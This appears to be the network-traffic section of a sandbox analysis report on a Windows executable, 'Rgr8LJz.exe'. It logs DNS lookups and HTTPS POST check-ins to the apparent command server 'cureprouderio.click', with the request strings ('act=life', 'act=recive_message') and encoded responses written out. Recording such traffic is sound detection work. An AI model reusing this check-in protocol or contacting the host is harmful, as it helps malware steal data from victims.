Jan 8, 2025 13:57:59.915441990 CET	49738	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:59.915544033 CET	49738	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:57:59.915570021 CET	443	49738	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:00.397614956 CET	443	49738	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:00.397716045 CET	443	49738	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:00.397794008 CET	49738	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:00.398025036 CET	49738	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:00.398050070 CET	443	49738	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:00.503129959 CET	49739	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:00.503199100 CET	443	49739	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:00.503285885 CET	49739	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:00.508773088 CET	49739	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:00.508790016 CET	443	49739	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:00.976361990 CET	443	49739	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:00.976526022 CET	49739	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:01.046722889 CET	49739	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:01.046757936 CET	443	49739	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:01.047765970 CET	443	49739	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:01.072721004 CET	49739	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:01.073777914 CET	49739	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:01.073837996 CET	443	49739	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:01.073929071 CET	49739	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:01.073939085 CET	443	49739	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:01.686681032 CET	443	49739	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:01.686784029 CET	443	49739	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:01.686883926 CET	49739	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:01.687079906 CET	49739	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:01.687100887 CET	443	49739	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:01.784280062 CET	49741	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:01.784321070 CET	443	49741	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:01.784423113 CET	49741	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:01.784780025 CET	49741	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:01.784790039 CET	443	49741	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:02.524800062 CET	443	49741	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:02.524981976 CET	49741	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:02.526338100 CET	49741	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:02.526350021 CET	443	49741	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:02.527189016 CET	443	49741	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:02.538585901 CET	49741	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:02.538677931 CET	49741	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:02.538681984 CET	443	49741	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:02.997634888 CET	443	49741	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:02.997734070 CET	443	49741	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:02.998003006 CET	49741	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:02.998111963 CET	49741	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:02.998131037 CET	443	49741	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.365664959 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.365715981 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.365789890 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.366292953 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.366305113 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.833658934 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.833728075 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.841806889 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.841829062 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.842053890 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.846457005 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.855885983 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.855921030 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.856062889 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.856096983 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.856218100 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.856268883 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.856408119 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.856447935 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.856621981 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.856672049 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.856862068 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.856899023 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.856909990 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.856923103 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.857067108 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.857100010 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.857122898 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.857253075 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.857289076 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.866215944 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.866400957 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.866436958 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:03.866461992 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.866512060 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.866539001 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:03.871553898 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:13.145889997 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:13.145968914 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:13.146037102 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:13.146209955 CET	49742	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:13.146225929 CET	443	49742	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:13.150398970 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:13.150450945 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:13.150547028 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:13.150799036 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:13.150810957 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:13.622602940 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:13.622737885 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:13.626792908 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:13.626806021 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:13.627074003 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:13.628288031 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:13.628288031 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:13.628360033 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.109493971 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.109543085 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.109570980 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.109622002 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.109652042 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:14.109685898 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.109781981 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:14.110017061 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.110157013 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:14.110171080 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.110301971 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.110471964 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:14.110485077 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.115040064 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.115070105 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.115098953 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:14.115113020 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.115169048 CET	443	49748	104.21.4.114	192.168.2.4
Jan 8, 2025 13:58:14.115195036 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:14.115421057 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:14.115422010 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:14.115760088 CET	49748	443	192.168.2.4	104.21.4.114
Jan 8, 2025 13:58:14.115780115 CET	443	49748	104.21.4.114	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 13:57:55.981472015 CET	64606	53	192.168.2.4	1.1.1.1
Jan 8, 2025 13:57:55.993710041 CET	53	64606	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 13:57:55.981472015 CET	192.168.2.4	1.1.1.1	0x6c18	Standard query (0)	cureprouderio.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 13:57:55.993710041 CET	1.1.1.1	192.168.2.4	0x6c18	No error (0)	cureprouderio.click		104.21.4.114	A (IP address)	IN (0x0001)	false
Jan 8, 2025 13:57:55.993710041 CET	1.1.1.1	192.168.2.4	0x6c18	No error (0)	cureprouderio.click		172.67.132.7	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cureprouderio.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.4.114	443	7352	C:\Users\user\Desktop\Rgr8LJz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:57:56 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: cureprouderio.click
2025-01-08 12:57:56 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-08 12:57:56 UTC	1129	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 12:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5uldqo7afjhef4qd2io2jc22bq; expires=Sun, 04 May 2025 06:44:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rcrAWLvlyTRUuk8ausXnUfDH1alwR3yGRkH1J9STInRuIEkQSu2KlrzUIBfoiut8aj0NIeqV1A0hfprcZ5LSUxxR%2FJ0OYXSE%2BR%2BARFkY3%2FQ1wpdMiLJbK0SxS2OCxQjz6yAXz%2BSX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fec5b30b9ce727a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=2005&rtt_var=756&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=910&delivery_rate=1442687&cwnd=224&unsent_bytes=0&cid=f210a131d4792d76&ts=484&x=0"
2025-01-08 12:57:56 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-08 12:57:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.4.114	443	7352	C:\Users\user\Desktop\Rgr8LJz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:57:57 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: cureprouderio.click
2025-01-08 12:57:57 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--nbgnxdlxdnyo&j=
2025-01-08 12:57:57 UTC	1125	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 12:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0kb1jmhd17qq35n80ujb8jjt03; expires=Sun, 04 May 2025 06:44:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4LCIMMHomy6TfGJ7D371rSr%2FzFAXM88EgSiojQSkP0hqVAyaZZ4zysLnjEhOmYfBSRgA3j35AlqQoj7cKqH8FD4vcpkxQ8cmqB%2FlgvleMlCFHoFMoAlW3hj%2Bm2QRhrXh4pOFcY9u"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fec5b36da1cefa9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1909&rtt_var=724&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=957&delivery_rate=1502830&cwnd=158&unsent_bytes=0&cid=74e39db01c5ea13a&ts=546&x=0"
2025-01-08 12:57:57 UTC	244	IN	Data Raw: 31 63 62 33 0d 0a 37 78 54 69 70 68 76 35 36 4c 36 42 59 78 63 65 67 6d 32 72 35 30 69 48 48 4d 47 6b 6b 6e 31 2f 75 56 6a 69 45 6d 47 7a 63 39 43 55 4e 70 53 45 49 63 33 45 6e 50 49 47 4e 53 54 32 48 39 36 43 5a 4b 56 39 70 59 61 6f 47 78 37 56 4b 34 63 2b 51 38 55 65 38 74 56 79 67 38 70 6f 6e 4d 53 63 35 42 73 31 4a 4e 6b 57 69 59 49 6d 70 53 62 6a 77 66 67 66 48 74 55 36 67 33 6b 4f 77 78 2b 7a 68 33 69 46 7a 6e 36 61 6a 4e 2f 74 44 6e 4a 37 35 77 7a 42 69 53 48 71 64 4b 79 47 76 6c 38 61 77 33 72 59 4d 43 7a 57 42 37 47 69 64 5a 48 4e 4f 59 54 45 78 61 4d 47 65 54 79 34 54 38 71 43 4b 75 74 36 70 63 2f 36 46 52 66 64 4f 34 5a 34 45 64 6f 56 75 49 64 32 68 73 39 30 6b 35 6a 53 35 77 6c 35 66 65 30 4d 69 63 74 71 34 6d Data Ascii: 1cb37xTiphv56L6BYxcegm2r50iHHMGkkn1/uVjiEmGzc9CUNpSEIc3EnPIGNST2H96CZKV9pYaoGx7VK4c+Q8Ue8tVyg8ponMSc5Bs1JNkWiYImpSbjwfgfHtU6g3kOwx+zh3iFzn6ajN/tDnJ75wzBiSHqdKyGvl8aw3rYMCzWB7GidZHNOYTExaMGeTy4T8qCKut6pc/6FRfdO4Z4EdoVuId2hs90k5jS5wl5fe0Mictq4m
2025-01-08 12:57:57 UTC	1369	IN	Data Raw: 62 6a 6e 72 42 4d 4c 39 67 72 6b 57 55 4f 77 52 66 79 6b 6a 69 5a 68 48 36 58 79 6f 53 6a 43 58 6c 79 35 51 7a 47 67 69 76 6c 62 4b 7a 47 38 78 63 56 33 7a 43 50 66 77 7a 66 47 37 57 46 66 34 66 4c 66 70 4f 4d 30 2b 42 42 4f 7a 7a 6e 46 34 6e 64 61 73 56 75 6f 4d 58 6b 45 67 79 62 4a 63 35 70 51 39 59 64 38 74 55 32 68 73 70 34 6c 6f 72 4f 36 77 70 2b 65 66 49 45 77 49 67 6e 35 58 4f 70 79 66 4d 66 47 74 45 77 6a 33 6f 48 33 42 79 30 6a 58 62 41 69 6a 6d 63 6b 70 79 37 51 56 5a 35 38 41 6a 46 6b 32 6a 66 50 72 79 49 36 56 38 61 31 33 72 59 4d 41 76 55 45 72 47 47 65 59 50 4d 63 6f 6d 4b 7a 75 55 4d 63 47 37 6d 43 73 65 50 4b 66 64 30 72 63 44 7a 46 68 62 53 50 34 64 30 51 35 39 52 74 5a 55 32 32 49 52 59 6c 6f 48 51 36 52 5a 31 50 50 39 42 30 4d 55 74 36 Data Ascii: bjnrBML9grkWUOwRfykjiZhH6XyoSjCXly5QzGgivlbKzG8xcV3zCPfwzfG7WFf4fLfpOM0+BBOzznF4ndasVuoMXkEgybJc5pQ9Yd8tU2hsp4lorO6wp+efIEwIgn5XOpyfMfGtEwj3oH3By0jXbAijmckpy7QVZ58AjFk2jfPryI6V8a13rYMAvUErGGeYPMcomKzuUMcG7mCsePKfd0rcDzFhbSP4d0Q59RtZU22IRYloHQ6RZ1PP9B0MUt6
2025-01-08 12:57:57 UTC	1369	IN	Data Raw: 2f 45 68 47 62 64 4d 42 33 47 35 46 4a 38 71 64 31 6c 4d 64 7a 32 62 2f 66 37 51 39 79 61 71 41 51 68 35 78 71 34 6e 4c 6a 6e 72 41 53 48 4e 4d 38 6b 6e 38 4f 30 68 2b 38 67 6e 4f 50 7a 48 6d 62 68 39 6e 6e 43 6e 35 2f 37 51 76 62 6a 79 72 74 65 36 4c 4d 2b 6c 39 54 6d 7a 32 59 4d 46 75 52 49 4b 57 47 4e 4c 58 48 64 35 57 4e 79 71 4d 65 4f 32 57 67 43 4d 58 46 63 71 56 7a 71 38 50 31 45 42 7a 52 4e 49 56 36 44 39 6b 66 73 5a 39 35 68 4d 52 31 6b 34 44 52 37 51 56 39 64 65 73 45 7a 34 55 72 37 7a 37 74 68 76 63 48 58 59 4e 36 74 48 63 50 33 42 37 77 75 48 57 4f 79 6e 36 4e 79 73 4f 74 47 44 56 37 37 45 2b 52 78 53 62 73 66 71 6a 4d 39 42 38 61 31 6a 2b 44 64 77 44 63 46 72 69 44 63 59 54 49 63 4a 61 4d 33 4f 51 46 63 47 37 6c 42 73 57 4a 61 71 73 2b 70 4e Data Ascii: /EhGbdMB3G5FJ8qd1lMdz2b/f7Q9yaqAQh5xq4nLjnrASHNM8kn8O0h+8gnOPzHmbh9nnCn5/7Qvbjyrte6LM+l9Tmz2YMFuRIKWGNLXHd5WNyqMeO2WgCMXFcqVzq8P1EBzRNIV6D9kfsZ95hMR1k4DR7QV9desEz4Ur7z7thvcHXYN6tHcP3B7wuHWOyn6NysOtGDV77E+RxSbsfqjM9B8a1j+DdwDcFriDcYTIcJaM3OQFcG7lBsWJaqs+pN
2025-01-08 12:57:57 UTC	1369	IN	Data Raw: 6d 7a 32 4d 4d 46 75 52 47 4c 75 66 65 49 37 4e 64 4a 32 43 32 2b 30 4d 66 6e 72 72 43 4d 36 44 4a 2b 31 7a 70 73 58 78 47 78 66 4a 4f 59 74 36 44 74 74 52 2f 4d 31 78 6d 49 51 68 32 36 33 51 79 68 46 75 62 76 5a 50 31 73 73 7a 70 58 6d 76 68 71 68 66 48 74 51 7a 6a 33 67 4c 33 68 36 32 67 33 43 47 79 58 79 55 67 4d 37 72 44 33 68 33 37 77 54 62 68 53 66 68 63 71 66 4f 2b 78 56 64 6c 58 71 48 61 45 4f 4a 55 59 65 41 65 59 44 48 62 39 75 56 6b 76 70 42 63 6e 43 67 56 34 6d 4a 4a 4f 56 78 72 38 72 37 46 78 7a 58 4e 49 64 31 43 74 6b 5a 6f 49 78 79 69 4d 56 33 6c 49 76 59 35 67 52 78 65 2b 51 4a 78 73 56 6b 70 58 6d 37 68 71 68 66 4d 76 77 50 77 6c 45 35 6b 51 37 38 6c 44 61 48 79 44 6e 44 79 74 44 67 44 58 31 7a 35 67 62 46 6a 79 50 75 63 71 6a 43 2f 42 59 Data Ascii: mz2MMFuRGLufeI7NdJ2C2+0MfnrrCM6DJ+1zpsXxGxfJOYt6DttR/M1xmIQh263QyhFubvZP1sszpXmvhqhfHtQzj3gL3h62g3CGyXyUgM7rD3h37wTbhSfhcqfO+xVdlXqHaEOJUYeAeYDHb9uVkvpBcnCgV4mJJOVxr8r7FxzXNId1CtkZoIxyiMV3lIvY5gRxe+QJxsVkpXm7hqhfMvwPwlE5kQ78lDaHyDnDytDgDX1z5gbFjyPucqjC/BY
2025-01-08 12:57:57 UTC	1369	IN	Data Raw: 58 45 46 77 78 61 37 6e 33 69 4e 79 33 47 54 67 39 33 6e 42 48 68 36 37 41 58 49 67 69 54 72 64 75 4f 49 73 42 67 46 6d 32 4c 41 55 52 50 4b 41 36 53 41 56 34 33 4c 4f 59 54 45 78 61 4d 47 65 54 79 34 54 38 43 58 4c 75 68 73 71 73 48 2b 45 42 37 4a 4f 34 31 37 45 64 59 65 74 6f 70 36 68 73 74 2f 6d 6f 2f 57 37 77 5a 77 64 2b 38 44 69 63 74 71 34 6d 62 6a 6e 72 41 78 46 73 67 74 67 33 34 49 78 77 72 79 6b 6a 69 5a 68 48 36 58 79 6f 53 6a 41 6e 35 33 35 41 2f 46 68 53 37 6f 66 72 48 4a 39 78 67 55 30 43 69 4b 64 77 54 61 47 62 6d 43 63 4a 4c 49 64 34 6d 50 7a 76 46 42 4f 7a 7a 6e 46 34 6e 64 61 74 4e 35 73 39 62 7a 58 53 7a 4e 4f 5a 5a 37 44 74 31 52 72 63 4e 76 77 4d 4e 31 32 39 4b 63 35 51 35 38 66 2b 38 4f 77 49 6b 6e 34 48 65 6d 78 2f 59 62 46 39 45 36 Data Ascii: XEFwxa7n3iNy3GTg93nBHh67AXIgiTrduOIsBgFm2LAURPKA6SAV43LOYTExaMGeTy4T8CXLuhsqsH+EB7JO417EdYetop6hst/mo/W7wZwd+8Dictq4mbjnrAxFsgtg34IxwrykjiZhH6XyoSjAn535A/FhS7ofrHJ9xgU0CiKdwTaGbmCcJLId4mPzvFBOzznF4ndatN5s9bzXSzNOZZ7Dt1RrcNvwMN129Kc5Q58f+8OwIkn4Hemx/YbF9E6
2025-01-08 12:57:57 UTC	1369	IN	Data Raw: 35 66 71 38 31 78 6a 49 51 68 32 34 6e 62 34 41 42 2f 64 65 77 41 7a 6f 45 34 37 33 6d 78 78 2f 45 55 45 4e 63 36 6a 58 30 4a 30 42 69 2f 67 58 75 48 77 33 61 65 79 70 4b 6a 42 6d 30 38 75 45 2f 6f 69 43 48 70 4a 66 6d 47 37 31 45 45 6d 7a 32 4d 4d 46 75 52 45 62 69 49 66 49 33 48 64 70 69 59 33 65 55 54 64 58 48 71 48 63 4f 4f 4c 2b 68 7a 72 73 58 32 47 52 62 58 4b 49 6c 77 41 4e 70 52 2f 4d 31 78 6d 49 51 68 32 36 6e 4c 39 51 74 79 63 50 59 45 79 49 59 38 36 47 37 6a 69 4c 41 4f 47 73 70 36 32 47 59 54 78 68 61 74 77 32 2f 41 77 33 58 62 30 70 7a 6c 43 48 4e 37 35 67 48 62 67 43 7a 71 63 61 72 50 39 42 63 65 32 7a 36 45 64 77 62 53 48 62 6d 4b 64 59 2f 41 63 4a 57 44 30 36 4e 50 4e 58 76 34 54 35 48 46 43 2f 35 39 72 38 75 77 41 46 50 43 65 6f 64 38 51 Data Ascii: 5fq81xjIQh24nb4AB/dewAzoE473mxx/EUENc6jX0J0Bi/gXuHw3aeypKjBm08uE/oiCHpJfmG71EEmz2MMFuREbiIfI3HdpiY3eUTdXHqHcOOL+hzrsX2GRbXKIlwANpR/M1xmIQh26nL9QtycPYEyIY86G7jiLAOGsp62GYTxhatw2/Aw3Xb0pzlCHN75gHbgCzqcarP9Bce2z6EdwbSHbmKdY/AcJWD06NPNXv4T5HFC/59r8uwAFPCeod8Q
2025-01-08 12:57:57 UTC	266	IN	Data Raw: 56 4e 71 44 50 62 35 36 4e 79 71 45 30 64 6e 4c 75 43 4e 2f 46 4e 64 6f 77 34 38 6e 71 58 30 58 69 49 38 42 33 44 35 46 4a 38 70 68 78 67 4d 4e 6a 6a 59 33 51 38 67 70 34 63 4d 49 41 7a 70 4d 70 36 6e 32 79 7a 37 77 55 45 4a 74 30 77 48 63 62 6b 55 6e 79 6f 6e 47 57 78 31 61 59 6d 39 57 6a 54 7a 56 37 39 6b 2b 52 78 52 53 6c 62 4b 44 57 38 78 41 4d 35 58 72 59 61 54 32 52 47 71 53 4b 5a 6f 50 53 63 70 61 47 7a 64 31 42 4c 53 69 79 58 5a 76 58 65 50 6f 2b 76 50 6d 2b 58 78 79 62 59 72 6c 70 51 38 64 52 36 74 38 34 77 4e 59 35 77 38 71 62 34 42 4e 6e 65 75 4d 5a 79 73 49 55 32 31 6d 31 7a 50 63 50 47 73 77 31 77 44 35 44 33 6c 48 71 74 44 61 4a 77 32 4b 4b 6e 4e 48 7a 42 6a 56 44 72 6b 2f 52 78 58 4b 6c 53 36 44 49 2f 68 67 4c 79 6e 65 6e 5a 67 6e 57 41 62 Data Ascii: VNqDPb56NyqE0dnLuCN/FNdow48nqX0XiI8B3D5FJ8phxgMNjjY3Q8gp4cMIAzpMp6n2yz7wUEJt0wHcbkUnyonGWx1aYm9WjTzV79k+RxRSlbKDW8xAM5XrYaT2RGqSKZoPScpaGzd1BLSiyXZvXePo+vPm+XxybYrlpQ8dR6t84wNY5w8qb4BNneuMZysIU21m1zPcPGsw1wD5D3lHqtDaJw2KKnNHzBjVDrk/RxXKlS6DI/hgLynenZgnWAb
2025-01-08 12:57:57 UTC	1369	IN	Data Raw: 32 63 65 31 0d 0a 4b 68 4c 42 50 4e 58 6a 78 54 35 48 56 65 4c 34 72 38 4a 47 67 54 51 4b 56 49 38 42 6d 51 34 6c 44 2f 4d 31 6b 77 4a 77 35 33 49 6e 4f 38 51 64 32 61 75 4e 49 39 37 73 4e 2f 33 4f 6c 30 65 45 68 49 39 77 67 6a 58 59 55 77 46 32 6e 6a 6e 69 4f 77 32 2f 62 78 4a 7a 73 51 53 31 46 6f 45 65 4a 75 6d 53 6c 5a 75 4f 65 73 43 6f 65 31 54 53 48 5a 68 4b 63 4e 71 69 41 63 4a 66 56 4f 64 58 4b 32 71 4e 5a 4a 7a 4b 67 43 39 6a 46 63 72 55 73 2b 4a 4f 6a 53 45 32 4a 4a 63 35 70 51 38 64 52 36 74 38 34 77 4e 59 35 77 38 71 62 34 42 4e 6e 65 75 4d 5a 79 73 49 55 32 31 43 6b 77 50 55 59 44 5a 6b 55 69 32 51 45 6b 56 2f 79 67 6a 62 59 2f 54 6e 54 79 75 4f 74 51 57 30 38 75 45 2f 38 68 69 54 72 65 62 58 58 76 54 45 61 33 54 2b 48 59 45 48 2f 47 71 61 4b Data Ascii: 